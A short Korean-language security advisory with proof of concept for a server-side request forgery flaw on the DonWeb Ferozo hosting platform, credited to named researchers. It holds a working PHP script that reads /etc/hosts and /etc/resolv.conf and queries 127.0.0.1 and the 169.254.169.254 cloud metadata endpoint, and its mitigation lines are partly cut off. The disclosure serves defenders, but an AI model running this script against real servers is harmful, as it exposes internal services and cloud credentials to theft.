
CVE-2025-45955의 개념 증명 익스플로잇: DonWeb Ferozo 호스팅 플랫폼에서 서버 측 요청 위조(SSRF)를 시연하여 내부 인프라 매핑 및 클라우드 메타데이터 열거를 가능하게 합니다.
공격자는 Ferozo 호스팅 플랫폼에 특수하게 조작된 PHP 파일을 업로드하고 실행하여 이 취약점을 악용할 수 있습니다. 해당 파일에 접근하면 내부 서비스(예: 127.0.0.1, 169.254.169.254 또는 서비스 메시 엔드포인트), 로컬 파일(예: file:///etc/passwd), 알려진 클라우드 메타데이터 엔드포인트를 대상으로 일련의 SSRF 시도를 실행합니다. 스크립트는 응답 또는 오류 메시지를 수집하여 공격자가 내부 인프라를 매핑하고 접근 가능한 서비스를 열거하며 추가 공격을 위한 민감한 정보를 수집할 수 있도록 합니다.
다음 코드는 취약점을 시연합니다:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents, fopen 등) 제한127.0.0.0/8, 169.254.169.254 등)에 대한 접근 차단CVE-2025-45955
다음에 의해 보고됨 [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]